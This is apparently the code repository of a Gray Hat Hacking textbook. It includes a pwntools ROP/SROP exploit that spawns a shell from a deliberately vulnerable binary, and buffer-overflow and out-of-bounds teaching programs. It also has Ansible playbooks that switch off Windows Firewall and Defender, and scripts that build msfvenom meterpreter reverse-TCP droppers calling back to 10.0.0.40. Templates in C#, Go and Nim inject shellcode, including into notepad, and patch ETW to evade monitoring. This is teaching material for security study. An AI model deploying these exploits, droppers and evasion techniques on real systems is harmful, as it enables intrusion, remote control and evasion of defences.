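/* Heap demo: copy a string into a malloc'd buffer, print it, free it, print the rest. */
int main(void) {
    char *ghh = malloc(30); /* room for the 16-character text plus its terminator */
    if (ghh == NULL) {
        perror("malloc");
        return 1;
    }
    /* The original strncpy'd exactly 16 bytes -- the length of the text -- so no NUL was
       written and printf read on into uninitialised heap memory. snprintf always terminates. */
    snprintf(ghh, 30, "%s", "Gray Hat Hacking");
    printf("%s - ", ghh);
    free(ghh);
    puts("6th Edition");
    return 0;
}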
================================================
FILE: ch03/leak-bof-exploit.py
================================================
#!/usr/bin/env python3
# Chapter 3 demo against ./leak-bof (leak-bof.c in this directory): the target prints printf's
# address and then read()s 2000 bytes into a 128-byte stack buffer. Defender notes grounded in
# that source: the printed address is what makes the libc base computable below (ASLR alone would
# otherwise hide it), and the write past buff would be caught by a stack canary if the binary were
# built with -fstack-protector. Offsets are tied to the exact libc build named below.
from pwn import *
context.update(arch='amd64', os='linux')
elf = ELF("./leak-bof")
libc = ELF("/usr/lib/x86_64-linux-gnu/libc-2.33.so")  # path and version specific to the demo machine
p = process("./leak-bof")
l = log.progress("Stage 1: leak printf and calculate libc's base address")
p.readuntil(b"I'm leaking printf: ")
# libc base = leaked runtime address of printf minus printf's offset inside this libc build
libc.address = int(p.readline(), 16) - libc.sym['printf']
l.success(f"0x{libc.address:x}")
rop = ROP(libc.file.name)
l = log.progress("Stage 2: pop a shell with ROP + SROP payload")
bin_sh = next(libc.search(b'/bin/sh'))
syscall = libc.address + rop.syscall.address
rop.raw(libc.address + rop.find_gadget(['pop rax', 'ret']).address)
rop.raw(constants.SYS_rt_sigreturn)
rop.raw(syscall)
# build SROP frame
frame = SigreturnFrame(kernel="amd64", arch="amd64")
frame.rax = constants.SYS_execve
frame.rdi = bin_sh
frame.rsi = 0
frame.rdx = 0
frame.rsp = bin_sh
frame.rip = syscall
# send stack smash and payload (answers the "Overflows with 128 bytes: " prompt from leak-bof.c)
p.sendlineafter(b": ", b"A"*136 + rop.chain() + bytes(frame))
l.success('Enjoy!')
p.interactive()
================================================
FILE: ch03/leak-bof.c
================================================
// leak-bof.c
#include <stdio.h>
#include <unistd.h>
// Deliberately vulnerable (the chapter's target): read() is told it may store 2000 bytes in a
// 128-byte stack buffer, so any input longer than the buffer overwrites the frame above it.
// The prompt says as much. A correct call would pass sizeof buff.
void vuln() {
char buff[128];
printf("Overflows with 128 bytes: ");
fflush(stdout); // make sure the prompt is visible before blocking in read()
read(0, buff, 2000);
}
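/* Prints printf's runtime address (the information leak the chapter's exploit relies on) and
   then calls the vulnerable reader. argc/argv are unused. */
int main(int argc, char **argv) {
    (void)argc;
    (void)argv;
    /* %p expects a void *; the original passed a (long), which is undefined behaviour even
       though it printed the same digits on x86-64. Casting to void * keeps the output the
       demo depends on. */
    printf("I'm leaking printf: %p\n", (void *)printf);
    vuln();
    return 0;
}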
================================================
FILE: ch04/students-patched.c
================================================
// students.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// One row of students.csv as loaded by LoadStudents.
typedef struct {
char name[24]; // name column; copied with strncpy, so only terminated when shorter than 24 bytes
int id; // position in students[], assigned by LoadStudents
int grades; // numeric column, parsed with atoi
} Student;
// Credential baked into the binary: visible with `strings` on the executable, which is the point
// of the demo -- never do this in real code.
char admin_password[32] = "Ultr4S3cr3tP4ssw0rd!";
Student students[32]; // fixed-capacity table; LoadStudents fills at most 32 rows
int count = 0; // number of rows loaded; valid indices are 0..count-1
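/* Fills students[] and count from students.csv ("name,grades" per line, see students.csv).
   Exits the program when the file is missing. Rows without a comma are skipped; at most 32
   rows are read. */
void LoadStudents() {
    memset(&students, 0, sizeof(Student)*32);
    FILE *f = fopen("students.csv", "r");
    if (!f) {
        printf("ERROR: 'students.csv' database file missing!\n");
        exit(0);
    }
    /* %127s leaves room for the terminator in line[128]; the original %128s could write 129
       bytes. Testing the fscanf result (rather than feof) is the robust way to stop at EOF. */
    char line[128];
    count = 0;
    while (count < 32 && fscanf(f, "%127s", line) == 1) {
        char *comma = strchr(line, ',');
        if (comma == NULL) {
            continue; /* malformed row: the original wrote through the NULL pointer */
        }
        *comma = '\0';
        students[count].id = count;
        /* Bounded copy plus explicit terminator so a 24+ character name cannot leave
           name[] unterminated (the original strncpy(..., 24) could). */
        strncpy(students[count].name, line, sizeof(students[count].name) - 1);
        students[count].name[sizeof(students[count].name) - 1] = '\0';
        students[count].grades = atoi(comma + 1);
        count++;
    }
    fclose(f);
}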
/* Prints a header followed by one "index - name<tab>grades" line per loaded student. */
void ListStudents() {
    printf("\nNum Name Grades\n");
    int idx = 0;
    while (idx < count) {
        const Student *s = &students[idx];
        printf("%d - %s\t%6d\n", idx, s->name, s->grades);
        idx++;
    }
}
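/* Asks for a student index on stdin, prints that student's row and returns the index.
   Returns -1 (after printing a message) when the input is not a number or is outside
   0..count-1. */
int ViewStudentGrades() {
    int i;
    printf("Enter student number: ");
    if (scanf("%d", &i) != 1) { /* non-numeric input left i uninitialised in the original */
        printf("Invalid student number!\n");
        return -1;
    }
    /* Valid indices are 0..count-1; the original accepted i == count, which is an empty
       slot or -- with all 32 slots full -- one element past the end of students[]. */
    if (i < 0 || i >= count) {
        printf("Invalid student number!\n");
        return -1;
    }
    printf("\nNum Name Grades\n");
    printf("%d - %s\t%6d\n", i, students[i].name, students[i].grades);
    return i;
}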
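/* Password-gated grade update: reads the admin password, then a student index (via
   ViewStudentGrades) and a new grade, and stores the grade. Any failure prints a message
   and returns without changing anything. */
void ChangeStudentGrades() {
    char pass[32];
    printf("Enter admin password: ");
    /* %31s keeps the terminator inside pass[32]; the original %32s could write 33 bytes.
       The array itself is passed, not &pass (a char (*)[32], which is the wrong type). */
    if (scanf("%31s", pass) != 1) {
        printf("Incorrect password!\n\n");
        return;
    }
    if (strcmp(pass, admin_password)) {
        printf("Incorrect password!\n\n");
        return;
    }
    int idx, grades;
    if ((idx = ViewStudentGrades()) == -1) {
        return;
    }
    printf("Enter new grades: ");
    if (scanf("%d", &grades) != 1) { /* the original stored an uninitialised value here */
        printf("Invalid grades!\n");
        return;
    }
    students[idx].grades = grades;
    printf("\n%s's new grade is %d\n", students[idx].name, grades);
}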
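/* Menu loop. Returns 0 on "Exit" or when stdin is exhausted; `int main(void)` replaces the
   non-standard `void main`. */
int main(void) {
    int opt;
    LoadStudents();
    for (;;) {
        printf(
        "\n=========================\n"
        " Grades Management \n"
        "=========================\n"
        " 1) List students\n"
        " 2) View grades\n"
        " 3) Change grades\n"
        " 4) Exit\n"
        "=========================\n"
        "Enter option: ");
        if (scanf("%i", &opt) != 1) {
            /* EOF / read error: the original left opt unchanged and re-printed the menu
               forever (e.g. with stdin closed or piped). */
            if (feof(stdin) || ferror(stdin)) {
                return 0;
            }
            /* Non-numeric token: discard the rest of the line so the next read progresses. */
            int ch;
            while ((ch = getchar()) != '\n' && ch != EOF) {
            }
            printf("Invalid Option!\n");
            continue;
        }
        switch (opt) {
            case 1: ListStudents(); break;
            case 2: ViewStudentGrades(); break;
            case 3: ChangeStudentGrades(); break;
            case 4: return 0;
            default: printf("Invalid Option!\n");
        }
    }
}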
================================================
FILE: ch04/students.c
================================================
// students.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// One row of students.csv as loaded by LoadStudents.
typedef struct {
char name[24]; // name column; copied with strncpy, so only terminated when shorter than 24 bytes
int id; // position in students[], assigned by LoadStudents
int grades; // numeric column, parsed with atoi
} Student;
// Credential baked into the binary: visible with `strings` on the executable, which is the point
// of the demo -- never do this in real code.
char admin_password[32] = "Ultr4S3cr3tP4ssw0rd!";
Student students[32]; // fixed-capacity table; LoadStudents fills at most 32 rows
int count = 0; // number of rows loaded; valid indices are 0..count-1
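/* Fills students[] and count from students.csv ("name,grades" per line, see students.csv).
   Exits the program when the file is missing. Rows without a comma are skipped; at most 32
   rows are read. */
void LoadStudents() {
    memset(&students, 0, sizeof(Student)*32);
    FILE *f = fopen("students.csv", "r");
    if (!f) {
        printf("ERROR: 'students.csv' database file missing!\n");
        exit(0);
    }
    /* %127s leaves room for the terminator in line[128]; the original %128s could write 129
       bytes. Testing the fscanf result (rather than feof) is the robust way to stop at EOF. */
    char line[128];
    count = 0;
    while (count < 32 && fscanf(f, "%127s", line) == 1) {
        char *comma = strchr(line, ',');
        if (comma == NULL) {
            continue; /* malformed row: the original wrote through the NULL pointer */
        }
        *comma = '\0';
        students[count].id = count;
        /* Bounded copy plus explicit terminator so a 24+ character name cannot leave
           name[] unterminated (the original strncpy(..., 24) could). */
        strncpy(students[count].name, line, sizeof(students[count].name) - 1);
        students[count].name[sizeof(students[count].name) - 1] = '\0';
        students[count].grades = atoi(comma + 1);
        count++;
    }
    fclose(f);
}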
/* Prints a header followed by one "index - name<tab>grades" line per loaded student. */
void ListStudents() {
    printf("\nNum Name Grades\n");
    int idx = 0;
    while (idx < count) {
        const Student *s = &students[idx];
        printf("%d - %s\t%6d\n", idx, s->name, s->grades);
        idx++;
    }
}
// Asks for a student index on stdin, prints that student's row and returns the index.
// This is the chapter's deliberately unpatched version: with the bounds check below left
// commented out, whatever integer is typed indexes students[] directly, so negative or large
// values read outside the 32-element table -- and ChangeStudentGrades then uses the same index
// for its write. students-patched.c is the same file with the check enabled.
int ViewStudentGrades() {
int i;
printf("Enter student number: ");
scanf("%d", &i); // return value unchecked: non-numeric input leaves i uninitialised
/*VULN - Uncomment to compile Patched version
if (i < 0 || i > count) {
printf("Invalid student number!\n");
return -1;
}
VULN*/
printf("\nNum Name Grades\n");
printf("%d - %s\t%6d\n", i, students[i].name, students[i].grades);
return i;
}
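/* Password-gated grade update: reads the admin password, then a student index (via
   ViewStudentGrades) and a new grade, and stores the grade. Any failure prints a message
   and returns without changing anything. */
void ChangeStudentGrades() {
    char pass[32];
    printf("Enter admin password: ");
    /* %31s keeps the terminator inside pass[32]; the original %32s could write 33 bytes.
       The array itself is passed, not &pass (a char (*)[32], which is the wrong type). */
    if (scanf("%31s", pass) != 1) {
        printf("Incorrect password!\n\n");
        return;
    }
    if (strcmp(pass, admin_password)) {
        printf("Incorrect password!\n\n");
        return;
    }
    int idx, grades;
    if ((idx = ViewStudentGrades()) == -1) {
        return;
    }
    printf("Enter new grades: ");
    if (scanf("%d", &grades) != 1) { /* the original stored an uninitialised value here */
        printf("Invalid grades!\n");
        return;
    }
    students[idx].grades = grades;
    printf("\n%s's new grade is %d\n", students[idx].name, grades);
}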
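/* Menu loop. Returns 0 on "Exit" or when stdin is exhausted; `int main(void)` replaces the
   non-standard `void main`. */
int main(void) {
    int opt;
    LoadStudents();
    for (;;) {
        printf(
        "\n=========================\n"
        " Grades Management \n"
        "=========================\n"
        " 1) List students\n"
        " 2) View grades\n"
        " 3) Change grades\n"
        " 4) Exit\n"
        "=========================\n"
        "Enter option: ");
        if (scanf("%i", &opt) != 1) {
            /* EOF / read error: the original left opt unchanged and re-printed the menu
               forever (e.g. with stdin closed or piped). */
            if (feof(stdin) || ferror(stdin)) {
                return 0;
            }
            /* Non-numeric token: discard the rest of the line so the next read progresses. */
            int ch;
            while ((ch = getchar()) != '\n' && ch != EOF) {
            }
            printf("Invalid Option!\n");
            continue;
        }
        switch (opt) {
            case 1: ListStudents(); break;
            case 2: ViewStudentGrades(); break;
            case 3: ChangeStudentGrades(); break;
            case 4: return 0;
            default: printf("Invalid Option!\n");
        }
    }
}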
================================================
FILE: ch04/students.csv
================================================
Jordan,84
Milley,91
Debbie,65
Joseph,60
Xuang,98
Tamara,88
================================================
FILE: ch05/myAtoi.c
================================================
#include <stdio.h>
#include <stdlib.h>
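/* Parses a decimal string into an int in the spirit of atoi(): optional leading blanks and
   sign, then digits; parsing stops at the first non-digit. Returns 0 for NULL or an empty
   string. Unlike the original, a non-digit no longer corrupts the result (it folded every
   byte as c - '0', so "12a" came out as 169). Overflow is not guarded, as with atoi(). */
int myAtoi(char *str){
    if (str == NULL) {
        return 0;
    }
    int i = 0;
    while (str[i] == ' ' || str[i] == '\t' || str[i] == '\n') {
        ++i;
    }
    int sign = 1;
    if (str[i] == '-' || str[i] == '+') {
        if (str[i] == '-') {
            sign = -1;
        }
        ++i;
    }
    int res = 0;
    for (; str[i] >= '0' && str[i] <= '9'; ++i) {
        res = res * 10 + (str[i] - '0');
    }
    return sign * res;
}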
/* Converts a fixed sample string with myAtoi and prints the result. */
int main(void) {
    static const char sample[] = "1234";
    printf("Value is: %d\n", myAtoi((char *)sample));
    return 0;
}
================================================
FILE: ch05/myProg.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// Deliberately unsafe (the chapter's teaching example): strcpy copies `input` up to its NUL
// into a 60-byte stack buffer with no length check, so an argument of 60 bytes or more
// overwrites the rest of the frame. A bounded copy (snprintf with sizeof string1) would be
// the fix; the file keeps it as written so the overflow can be studied.
int func1(char* input)
{
char string1[60];
strcpy(string1, input);
printf("You entered %s", string1); // note: no trailing newline
return 0;
}
/* Requires exactly one argument and hands it to func1; exits with status 1 otherwise. */
int main(int argc, char* argv[])
{
    if (argc == 2) {
        func1(argv[1]);
        return 0;
    }
    printf("Usage: Enter Something\n");
    exit(1);
}
================================================
FILE: ch07/Lab/ansible/ansible.cfg
================================================
[defaults]
# Skip SSH host-key verification: convenient for throwaway lab hosts whose keys change on every
# rebuild, but it removes the defence against a man-in-the-middle on first connect.
host_key_checking = False
# Drop into the interactive task debugger when a task fails; not suitable for unattended runs.
enable_task_debugger = True
================================================
FILE: ch07/Lab/ansible/ch07_playbook.yml
================================================
---
# Lab build order: the domain controller first (DNS, AD, users), then the target host joins the
# domain, then the Kali box is customised. vars/users.yml (account names and presumably their
# passwords -- confirm) is shared by the DC and Kali plays; keep real credentials out of it if
# this repository is shared.
- hosts: dc
  roles:
    - common
    - windows_dns_server
    - windows_domain_controller
    - windows_domain_users_groups
  vars_files:
    - vars/vars.yml
    - vars/users.yml
- hosts: target
  gather_facts: yes
  roles:
    - common
    - windows_client_join_domain
    - target_customizations
  vars_files:
    - vars/vars.yml
# Kali tasks run with privilege escalation (become) since they install packages and patch system files.
- hosts: kali
  become: yes
  roles:
    - kali_customizations
  vars_files:
    - vars/vars.yml
    - vars/users.yml
================================================
FILE: ch07/Lab/ansible/roles/common/defaults/main.yml
================================================
---
================================================
FILE: ch07/Lab/ansible/roles/common/handlers/main.yml
================================================
---
================================================
FILE: ch07/Lab/ansible/roles/common/meta/main.yml
================================================
---
galaxy_info:
role_name: install_misc_software
author: Russ Nolen rnolen@splunk.com
description: Install some basic software
license: BSD
min_ansible_version: 2.4
platforms:
- name: Windows
versions:
- 2012R2
- Win10
galaxy_tags:
- system
- security
dependencies: []
================================================
FILE: ch07/Lab/ansible/roles/common/tasks/chocolatey-components.yml
================================================
---
# NOTE(review): this runs whatever https://chocolatey.org/install.ps1 serves at play time, with no
# version pin or hash check (the same pattern as CloudSetup/*/bootstrap.ps1). 3072 OR'd into
# SecurityProtocol is SecurityProtocolType.Tls12.
- name: Install Chocolately via Powershell
  win_shell: "Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iwr https://chocolatey.org/install.ps1 -UseBasicParsing | iex
"
# Installed through the Chocolatey client set up above.
- name: Install notepadplusplus
  win_chocolatey:
    name: notepadplusplus
================================================
FILE: ch07/Lab/ansible/roles/common/tasks/main.yml
================================================
---
# Both steps deliberately weaken the Windows lab hosts (firewall off, real-time AV off). Only the
# Defender include is gated on the OS; the firewall task and the Chocolatey include always run --
# the two comments below are the author's own TODO about that.
# need to wrap an if statement around this one
# make it windows specific
- name : Disable Windows Firewall
  win_firewall:
    state: disabled
- include: windows-disable-defender.yml
  when: ansible_distribution is search ('Microsoft')
- include: chocolatey-components.yml
================================================
FILE: ch07/Lab/ansible/roles/common/tasks/windows-components.yml
================================================
---
# NOTE(review): the installer is fetched over HTTPS from download.microsoft.com with no hash check.
# product_id is what lets win_package skip the install when that product is already present.
- name: Install the Visual C++ Redistributable
  win_package:
    path: "https://download.microsoft.com/download/9/3/F/93FCF1E7-E6A4-478B-96E7-D4B285925B00/vc_redist.x64.exe"
    product_id: '{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}'
    arguments: /install /passive /norestart
================================================
FILE: ch07/Lab/ansible/roles/common/tasks/windows-disable-defender.yml
================================================
---
# Sets the Group Policy value that turns off Defender real-time scanning on the lab hosts.
# NOTE(review): on newer builds Tamper Protection may override this policy -- confirm for the
# Server versions the lab uses.
- name: Disable Windows Defender
  win_regedit:
    key: "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
    value: DisableRealTimeMonitoring
    datatype: dword
    data: 1
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/addshare.txt
================================================
# Samba share definition appended on the lab Kali host: exports /tmp read-only to anonymous
# (guest) clients.
# NOTE(review): `guest ok = yes` together with `path = /tmp` means anything any local process
# drops into /tmp is readable network-wide; `read only = yes` keeps clients from writing, which
# also makes `create mask` moot for this share.
[ghh]
comment = GHH Share
browseable = yes
path = /tmp
printable = no
guest ok = yes
read only = yes
create mask = 0700
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/covenant.patch
================================================
--- /usr/share/kaboxer/covenant.kaboxer.orig 2021-09-12 19:28:35.392506176 +0000
+++ /usr/share/kaboxer/covenant.kaboxer.yaml 2021-09-12 18:54:26.224293412 +0000
@@ -26,6 +26,7 @@
publish_ports:
- 7443
- 443
+ - 80
before_run_script: |
#!/bin/sh
set -e
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/build_csharp.sh
================================================
#!/bin/bash
# Lab helper: renders csharp.template into csharp.cs with a msfvenom-generated array and compiles
# it with mcs. LHOST is hard-coded to 10.0.0.40 (presumably the lab Kali address -- confirm).
SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.40`
# Replace relevant lines: rename msfvenom's `buf` to the `shellcode` identifier the template uses
SC=${SC/buf/shellcode}
# Split the template at its INJECT marker line (the marker itself is dropped from both halves)
PRE=`grep -B 1000 INJECT csharp.template | grep -v INJECT`
POST=`grep -A 1000 INJECT csharp.template | grep -v INJECT`
# Format the output
echo "$PRE" > csharp.cs
echo "$SC" >> csharp.cs
echo "$POST" >> csharp.cs
mcs csharp.cs -out:/tmp/csharp_dropper64.exe
chmod 755 /tmp/csharp_dropper64.exe
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/build_go.sh
================================================
#!/bin/bash
# Lab helper: renders go.template into createFiber.go with a base64 msfvenom payload and
# cross-compiles it for Windows. LHOST is hard-coded to 10.0.0.40 (presumably the lab Kali
# address -- confirm).
SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f base64 --platform windows --arch x64 LHOST=10.0.0.40`
CODE=`cat go.template`
# Replace relevant lines: the first INJECT occurrence in the template becomes the payload string
CODE=${CODE/INJECT/$SC}
echo "$CODE" > createFiber.go
GOOS=windows GOARCH=amd64 go build -o /tmp/CreateFiber.exe createFiber.go
chmod 755 /tmp/CreateFiber.exe
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/build_nim.sh
================================================
#!/bin/bash
# Lab helper: rewrites msfvenom's C# array syntax into a Nim array literal, splices it into
# nim.template and compiles for Windows. LHOST is hard-coded to 10.0.0.40 (presumably the lab
# Kali address -- confirm).
SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.40`
# Replace relevant lines: C# declaration -> Nim `var shellcode: array[N, byte] = [ byte ... ]`
# (each substitution below rewrites only the first match of its pattern, except the last which
# strips every newline)
ORIG="byte[] buf = new byte["
FIX="var shellcode: array["
SC=${SC/$ORIG/$FIX}
SC=${SC/]/,byte] = }
SC=${SC/\}/]}
SC=${SC/{/\[ byte }
SC=${SC/;/}
SC=${SC/\[ \[/\[}
SC=${SC//[$'\n']}
CODE=`cat nim.template`
CODE=${CODE/INJECTHERE/$SC}
echo "$CODE" > dropper.nim
nim c -d=mingw -b=cpp --passL="-static-libgcc -static-libstdc++" --app=console --cpu=amd64 --out=/tmp/nim_dropper64.exe dropper.nim
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/csharp.template
================================================
using System;
using System.Runtime.InteropServices;
namespace GHHSCLauncher
{
    // Chapter 7 lab shellcode launcher template. build_csharp.sh splices the msfvenom-generated
    // `byte[] shellcode` array in at the placeholder line inside Main and compiles with mcs.
    // Defender note: the sequence visible in Main -- allocate read/write private memory, copy
    // bytes in, flip the protection to executable, start a thread at that address, wait on it --
    // is the canonical self-injection pattern that memory scanners and API-hooking EDRs key on.
    class Program
    {
        // VirtualAlloc / VirtualProtect flag values (Win32 MEM_* / PAGE_* constants)
        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_READWRITE = 0x04;
        private static UInt32 PAGE_EXECUTE = 0x10;
        // kernel32 imports used below
        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
        [DllImport("kernel32")]
        static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect);
        [DllImport("kernel32")]
        private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId );
        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds);
        static void Main()
        {
            // placeholder replaced by build_csharp.sh with the shellcode array declaration
            INJECT
            // 1. commit a read/write region the size of the array
            UInt32 scAddress = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_READWRITE);
            // 2. copy the bytes across
            Marshal.Copy(shellcode, 0, (IntPtr)(scAddress), shellcode.Length);
            // 3. make the region executable (previous protection returned in prot, unused)
            uint prot;
            VirtualProtect((IntPtr)(scAddress), shellcode.Length, PAGE_EXECUTE, out prot);
            // 4. run it on a new thread and block until that thread ends (0xFFFFFFFF = INFINITE)
            IntPtr hThread = IntPtr.Zero;
            UInt32 threadId = 0;
            IntPtr pinfo = IntPtr.Zero;
            hThread = CreateThread(0, 0, scAddress, pinfo, 0, ref threadId);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            return;
        }
    }
}
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/execute.template
================================================
import winim/lean
import strformat
import dynlib
import osproc
# One-byte patch written over the start of ntdll!EtwEventWrite: 0xc3 is `ret`, so the function
# returns immediately and this process stops emitting ETW events.
const patch: array[1, byte] = [byte 0xc3]

# Patches EtwEventWrite in the current process. Returns true when the byte was written, false
# when ntdll or the export could not be resolved or VirtualProtect refused (each failure prints
# an "[X]" line first).
# Defender note: user-mode tampering with ntdll code pages is detectable by comparing the mapped
# image against the on-disk DLL, and a VirtualProtect call on an image page is a common EDR
# hook point.
proc Patchntdll(): bool =
  var
    ntdll: LibHandle
    cs: pointer
    op: DWORD
    t: DWORD
    disabled: bool = false
  ntdll = loadLib("ntdll")
  if isNil(ntdll):
    echo "[X] Failed to load ntdll.dll"
    return disabled
  cs = ntdll.symAddr("EtwEventWrite") # equivalent of GetProcAddress()
  if isNil(cs):
    echo "[X] Failed to get the address of 'EtwEventWrite'"
    return disabled
  # 0x40 = PAGE_EXECUTE_READWRITE; the previous protection (op) is restored afterwards
  if VirtualProtect(cs, patch.len, 0x40, addr op):
    echo "[*] Applying patch"
    copyMem(cs, unsafeAddr patch, patch.len)
    VirtualProtect(cs, patch.len, op, addr t)
    disabled = true
  return disabled
# Remote-thread injection into a freshly started notepad.exe: start it, suspend it, allocate an
# RWX region inside it, copy `shellcode` across and start a thread at that address. The target
# process is never resumed. All handles are released via defer when the proc returns.
# Defender note: a thread whose start address lies in private (non-image-backed) RWX memory of a
# process such as notepad.exe is a textbook indicator for EDR thread-start and memory-scan checks.
proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
  # Under the hood, the startProcess function from Nim's osproc module is calling CreateProcess() :D
  let tProcess = startProcess("notepad.exe")
  tProcess.suspend() # That's handy!
  defer: tProcess.close()
  echo "[*] Target Process: ", tProcess.processID
  let pHandle = OpenProcess(
    PROCESS_ALL_ACCESS,
    false,
    cast[DWORD](tProcess.processID)
  )
  defer: CloseHandle(pHandle)
  echo "[*] pHandle: ", pHandle
  # allocate the destination region in the target, already executable
  let rPtr = VirtualAllocEx(
    pHandle,
    NULL,
    cast[SIZE_T](shellcode.len),
    MEM_COMMIT,
    PAGE_EXECUTE_READ_WRITE
  )
  var bytesWritten: SIZE_T
  let wSuccess = WriteProcessMemory(
    pHandle,
    rPtr,
    unsafeAddr shellcode,
    cast[SIZE_T](shellcode.len),
    addr bytesWritten
  )
  echo "[*] WriteProcessMemory: ", bool(wSuccess)
  echo " \\-- bytes written: ", bytesWritten
  echo ""
  # start a thread in the target at the region just written
  let tHandle = CreateRemoteThread(
    pHandle,
    NULL,
    0,
    cast[LPTHREAD_START_ROUTINE](rPtr),
    NULL,
    0,
    NULL
  )
  defer: CloseHandle(tHandle)
  echo "[*] tHandle: ", tHandle
  echo "[+] Injected"
INJECTHERE
# This is essentially the equivalent of 'if __name__ == '__main__' in python
when isMainModule:
  # `shellcode` is the array build_nim.sh splices in at the placeholder line above
  var success = Patchntdll()
  echo fmt"[*] ETW blocked by patch: {bool(success)}"
  injectCreateRemoteThread(shellcode)
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/go.mod
================================================
module createFiber.go
go 1.15
require golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 // indirect
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/go.sum
================================================
golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 h1:c20P3CcPbopVp2f7099WLOqSNKURf30Z0uq66HpijZY=
golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/go.template
================================================
// Inspired by ired.team and Ne0nd0g's go-shellcode repository
// Reference: https://github.com/Ne0nd0g/go-shellcode
// Reference: https://ired.team/offensive-security/code-injection-process-injection/executing-shellcode-with-createfiber
package main
// import modules we'll need. We will need unsafe and the windows libraries to be able to
// launch shellcode. The winddows library let's us use DLLs and unsafe bypasses go
// restrictions around casting so that we can execute code
import (
"encoding/base64"
"fmt"
"unsafe"
"golang.org/x/sys/windows"
)
// Constants that we will need
const (
_MEM_COMMIT = 0x1000
_MEM_RESERVE = 0x2000
_PAGE_RWX = 0x40
)
// main decodes the embedded base64 shellcode, places it in a private RWX
// allocation of the current process and transfers control to it via a fiber.
// "INJECT" is a build-time placeholder (the build script is not visible here).
//
// Defender notes: the sequence VirtualAlloc(PAGE_EXECUTE_READWRITE) ->
// RtlCopyMemory -> CreateFiber/SwitchToFiber never creates a new thread, so it
// does not surface as CreateRemoteThread telemetry; private RWX memory that is
// not backed by an image is the observable artefact.
func main() {
	// shellcode in base64
	sc := "INJECT"
	shellcode, err := base64.StdEncoding.DecodeString(sc)
	if err != nil {
		// NOTE(review): fmt.Sprintf only builds a string and its result is
		// discarded here and in every error branch below, so all failures exit
		// silently. Printing to stderr would actually report them.
		fmt.Sprintf("Base64 Decoding Error: %s", err.Error())
		return
	}
	// Load dlls
	kernel32 := windows.NewLazySystemDLL("kernel32.dll")
	ntdll := windows.NewLazySystemDLL("ntdll.dll")
	// memory creation/copy routines
	VirtualAlloc := kernel32.NewProc("VirtualAlloc")
	RtlCopyMemory := ntdll.NewProc("RtlCopyMemory")
	// Fiber creation routines
	ConvertThreadToFiber := kernel32.NewProc("ConvertThreadToFiber")
	CreateFiber := kernel32.NewProc("CreateFiber")
	SwitchToFiber := kernel32.NewProc("SwitchToFiber")
	// Only fibers can schedule fibers, so this converts the main thread into a fiber.
	// NOTE(review): LazyProc.Call returns a non-nil error even on success, which
	// is why the code compares the message text; that comparison is brittle
	// (locale/version dependent). Comparing against windows.ERROR_SUCCESS is
	// the robust form — confirm before changing.
	_, _, err = ConvertThreadToFiber.Call()
	if err != nil && err.Error() != "The operation completed successfully." {
		fmt.Sprintf("ConvertThreadToFiber Failed: %s", err.Error())
		return
	}
	// Create memory for our shellcode
	addr, _, err:= VirtualAlloc.Call(0, uintptr(len(shellcode)), _MEM_COMMIT|_MEM_RESERVE, _PAGE_RWX)
	// NOTE(review): if addr == 0 while err is nil, err.Error() below dereferences nil.
	if ((err != nil && err.Error() != "The operation completed successfully.") || addr == 0) {
		fmt.Sprintf("VirtualAlloc Failed:%s", err.Error())
		return
	}
	// Copy shellcode to our newly created memory
	// NOTE(review): &shellcode[0] panics when the decoded shellcode is empty.
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
	if err != nil && err.Error() != "The operation completed successfully." {
		fmt.Sprintf("RtlCopyMemory Failed:%s", err.Error())
		return
	}
	// Create Fiber to execute shellcode
	fiber, _, err:= CreateFiber.Call(0, addr, 0)
	if err!= nil && err.Error() != "The operation completed successfully." {
		fmt.Sprintf("CreateFiber Failed:%s", err.Error())
		return
	}
	// Switch to Fiber: control moves to the fiber and only comes back if the
	// fiber itself switches back.
	SwitchToFiber.Call(fiber)
}
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/nim.template
================================================
# Adapted from Byt3bl33der's ETW code.
import winim/lean
import strformat
import dynlib
import osproc
# 0xc3 = RET in assembly
const patch: array[1, byte] = [byte 0xc3]
proc Patchntdll(): bool =
